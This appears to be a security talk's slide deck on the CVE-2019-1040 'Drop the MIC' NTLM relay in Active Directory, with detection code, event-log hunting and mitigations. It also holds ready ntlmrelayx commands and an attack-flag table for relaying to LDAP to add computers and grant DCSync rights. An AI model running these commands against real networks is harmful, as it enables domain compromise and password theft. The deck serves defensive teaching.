Lateral Movement using Credentials Relaying
CVE-2019-1040 / Drop the MIC
Background
• Penetration Tester @Deloitte’s Risk Advisory
• @taso_x on Twitter
• https://github.com/tasox
• https://pentestlibrary.blogspot.com
Why Drop The MIC?
• NTLM relay is the most common technique used in Active Directory environments
• Compromise of the enterprise network (impact)
• Bypasses Microsoft’s security mechanisms (SMB Signing, LDAP Signing, MIC etc.)
• Relays between different protocols (SMB -> LDAP(S))
• The missing puzzle piece for recently discovered vulnerabilities (Printer Bug, Exchange – One API)
• Only 2 tools needed (Responder, NTLMRelayx)
How it works
“Attacker is able to modify the flags of the NTLM authentication including the signing requirement and bypass the NTLM Message Integrity Code (MIC) protection.”

What is the NTLM Protocol
“Windows Challenge/Response (NTLM) is the authentication protocol used on networks that include systems running the Windows operating system.”
https://docs.microsoft.com/en-us/windows/win32/secauthn/microsoft-ntlm
More NTLM…
• NTLM authentication consists of 3 message types: NTLM_NEGOTIATE, NTLM_CHALLENGE and NTLM_AUTHENTICATE.
• When users authenticate to a target via NTLM (NTLM over SMB, NTLM over LDAP, NTLM over HTTP, NTLM over RPC etc.), they are vulnerable to relay attacks.
• In order to protect servers from relay attacks, Microsoft introduced session signing (SMB Signing, LDAP Signing etc.).
• The NTLM Message Integrity Code (MIC) protects the NTLM authentication messages themselves.
What is NTLM Message Integrity Code?
“The Message Integrity Code (MIC) field verifies that the 3 NTLM messages [NTLM_NEGOTIATE, NTLM_CHALLENGE, NTLM_AUTHENTICATE] were not modified during transit.”
Drop The MIC (Modifications)

NTLMSSP_NEGOTIATE - Flags
• NTLMSSP_NEGOTIATE_ALWAYS_SIGN=0
• NTLMSSP_NEGOTIATE_SIGN=0

NTLMSSP_AUTHENTICATE - Flags
• NTLMSSP_NEGOTIATE_ALWAYS_SIGN=0
• NTLMSSP_NEGOTIATE_SIGN=0
• NEGOTIATE_KEY_EXCHANGE=0
• NEGOTIATE_VERSION=0
• MIC field (dropped)
https://blog.preempt.com/drop-the-mic
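As an added example (not from the slides, and not impacket's code), the following Python checks a captured NTLM AUTHENTICATE message for the modifications listed above: signing, key-exchange and version flags cleared, and the MIC field dropped while the NTLMv2 response's MsvAvFlags AV_PAIR still claims a MIC is present (the inconsistency the Microsoft fix verifies). Offsets and flag values follow MS-NLMP; the sample messages are constructed by build_authenticate, and the user name and response bytes are placeholders.

```python
import struct

NEGOTIATE_SIGN, ALWAYS_SIGN, KEY_EXCH, VERSION = 0x10, 0x8000, 0x40000000, 0x02000000
MSV_AV_FLAGS, MSV_AV_EOL, AV_FLAG_MIC_PRESENT = 0x0006, 0x0000, 0x00000002
STOCK_FLAGS = 0x00080201 | NEGOTIATE_SIGN | ALWAYS_SIGN | KEY_EXCH | VERSION  # + UNICODE, NTLM, EXT_SESSSEC

def av_flags(nt_resp):
    """MsvAvFlags value from the NTLMv2 response's AV_PAIR list (0 if the pair is absent)."""
    pos = 44                            # Response(16) + fixed NTLMv2_CLIENT_CHALLENGE header(28)
    while pos + 4 <= len(nt_resp):
        av_id, av_len = struct.unpack_from("<HH", nt_resp, pos)
        if av_id == MSV_AV_EOL:
            break
        if av_id == MSV_AV_FLAGS:
            return struct.unpack_from("<I", nt_resp, pos + 4)[0]
        pos += 4 + av_len
    return 0

def check_authenticate(msg):
    """Return findings matching the Drop-the-MIC modifications; [] for a stock message."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE message")
    # Six Len/MaxLen/Offset descriptors: Lm, Nt, Domain, User, Workstation, SessionKey
    fields = [struct.unpack_from("<HHI", msg, i) for i in range(12, 60, 8)]
    flags = struct.unpack_from("<I", msg, 60)[0]
    nt_len, _, nt_off = fields[1]
    # A stock message reserves Version(8) + MIC(16) after NegotiateFlags, so its
    # payload starts at 88; a payload starting earlier means the MIC field was dropped.
    first_payload = min((off for length, _, off in fields if length), default=len(msg))
    findings = []
    for bit, name in ((NEGOTIATE_SIGN | ALWAYS_SIGN, "SIGN/ALWAYS_SIGN"),
                      (KEY_EXCH, "KEY_EXCHANGE"), (VERSION, "VERSION")):
        if not flags & bit:
            findings.append(name + " cleared")
    if av_flags(msg[nt_off:nt_off + nt_len]) & AV_FLAG_MIC_PRESENT and first_payload < 88:
        findings.append("MsvAvFlags claims a MIC but the MIC field is missing")
    return findings

def build_authenticate(flags, with_mic):
    """Construct a minimal AUTHENTICATE message (constructed sample, not a capture)."""
    av = struct.pack("<HHIHH", MSV_AV_FLAGS, 4, AV_FLAG_MIC_PRESENT, MSV_AV_EOL, 0)
    nt_resp = b"\x11" * 16 + b"\x01\x01" + b"\x00" * 26 + av  # NTLMv2 response, AV pairs at 44
    user = "alice".encode("utf-16-le")                         # placeholder user name
    head = 88 if with_mic else 64                              # where the payload begins
    empty = lambda off: struct.pack("<HHI", 0, 0, off)         # zero-length field descriptor
    fields = (empty(head) + struct.pack("<HHI", len(nt_resp), len(nt_resp), head)
              + empty(head + len(nt_resp)) + struct.pack("<HHI", len(user), len(user), head + len(nt_resp))
              + empty(head + len(nt_resp) + len(user)) * 2)    # Workstation, EncryptedRandomSessionKey
    msg = b"NTLMSSP\x00" + struct.pack("<I", 3) + fields + struct.pack("<I", flags)
    return msg + (b"\x00" * 24 if with_mic else b"") + nt_resp + user
```

Running check_authenticate over the AUTHENTICATE messages seen by a relay-sensitive server (LDAP, SMB) gives a per-message signal that complements the event-log hunting described later in the deck.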
Drop The MIC (Modifications): original NTLM_NEGOTIATE vs. modified NTLM_NEGOTIATE (screenshot)
Drop The MIC (Modifications): original NTLM_AUTHENTICATE vs. modified NTLM_AUTHENTICATE (screenshot)
Why LDAP?
“LDAP can be used to read and modify objects in the Active Directory. When authentication is relayed to LDAP, objects in the directory can be modified to grant an attacker privileges, including the privileges required for DCSync operations.”
https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
DCSync: An attacker can pretend to be a Domain Controller and request passwords from the targeted Domain Controller
(NTLM over SMB) Relay to LDAP: NTLMRelayx syntax table

Attack scenario                                            | Protocol:Port | Attack flag        | Elevated NTLM | Bypass MIC
Add a domain computer                                      | ldaps:636     | --add-computer (1) | No            | --remove-mic
Create a domain user & give it DCSync rights               | ldaps:636     | --delegate-access  | Yes           | --remove-mic
Give DCSync rights to an existing domain user / computer (2) | ldap:389    | --escalate-user    | Yes           | --remove-mic

(1) Every domain user in AD can add 10 computer accounts.
(2) Version 0.9.20-dev of ntlmrelayx can not give DCSync rights to a domain computer account.
More (NTLM over SMB) Relay to LDAP: NTLMRelayx syntax table

Create a domain user and give it DCSync rights:
ntlmrelayx.py -t ldaps://192.168.100.236 --delegate-access -smb2support --remove-mic

Create a domain computer account:
ntlmrelayx.py -t ldaps://192.168.100.236 --add-computer -smb2support --remove-mic

Give DCSync rights to an existing domain user / computer:
ntlmrelayx.py -t ldap://192.168.100.236 --escalate-user <domain user / computer> -smb2support --remove-mic

* The latest version of ntlmrelayx, 0.9.20-dev, can not give DCSync rights to a domain computer account.
Create a domain Computer
Create a domain User & Grant DCSync privileges
Grant DCSync privileges to an existing domain User
Hunting Relaying

Create computer account (--add-computer):
Get-EventLog -LogName Security -InstanceId 4741
(A computer account was created)
More Hunting

Create user account & ACL modification (--delegate-access):
Get-EventLog -LogName Security -InstanceId 4720
(A user account was created)
More Hunting

Get-EventLog -LogName Security -InstanceId 5136
(A directory service object was modified): convert the logged SDDL and observe which ACEs were added
https://github.com/canix1/SDDL-Converter
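An added example (not from the slides, and not the SDDL-Converter project's code) of the "convert SDDL and observe" step in Python: it parses the nTSecurityDescriptor SDDL that Event 5136 records in its attribute value and reports any trustee outside an expected set that was granted the two replication extended rights DCSync depends on. The two GUIDs are the standard rightsGuid values of DS-Replication-Get-Changes and DS-Replication-Get-Changes-All; the sample value, domain SID and RID are constructed placeholders, and EXPECTED_TRUSTEES is an assumed baseline to tune per environment.

```python
import re

# Extended-right GUIDs that together allow a principal to replicate directory data (DCSync)
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# SDDL aliases that normally hold these rights on the domain object (assumed baseline)
EXPECTED_TRUSTEES = {"DA", "EA", "ED", "BA", "SY"}

def dacl_aces(sddl):
    """Yield the DACL's ACEs as (type, flags, rights, object_guid, inherit_guid, trustee)."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)   # DACL flags, then one or more (ACE)
    if not m:
        return
    for ace in re.findall(r"\(([^)]*)\)", m.group(1)):
        parts = ace.split(";")
        if len(parts) >= 6:
            yield tuple(parts[:6])

def replication_grants(sddl):
    """Map each trustee outside EXPECTED_TRUSTEES to the replication rights the DACL grants it."""
    grants = {}
    for ace_type, _flags, rights, obj_guid, _inherit, trustee in dacl_aces(sddl):
        right = REPLICATION_RIGHTS.get(obj_guid.lower())
        # Object ACE granting a control access right (CR) on one of the replication GUIDs
        if ace_type == "OA" and "CR" in rights and right and trustee not in EXPECTED_TRUSTEES:
            grants.setdefault(trustee, []).append(right)
    return grants

# Constructed sample of the nTSecurityDescriptor value Event 5136 records after a domain
# object's DACL was modified; the domain SID and RID 1105 are placeholders, not real values.
SAMPLE_5136_VALUE = (
    "O:DAG:DAD:AI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111111111-2222222222-3333333333-1105)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111111111-2222222222-3333333333-1105)"
    "(A;;RPLCLORC;;;AU)"
)
```

A trustee that appears in the result with both rights, shortly after a 4720 or 4741 event for a new account, is the pattern the --delegate-access and --escalate-user scenarios above leave behind.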
Mitigation

• Install Microsoft’s patches
• Configurations:
  • Enforce SMB Signing
  • LDAP Signing, LDAPS channel binding
• Disable NTLMv1
• Use Kerberos as much as possible
• Enable and monitor useful Windows Events
Thank You
Credits:
• Marina Simakov, Yaron Zinar
• Dirk-Jan Mollema
• Alberto Solino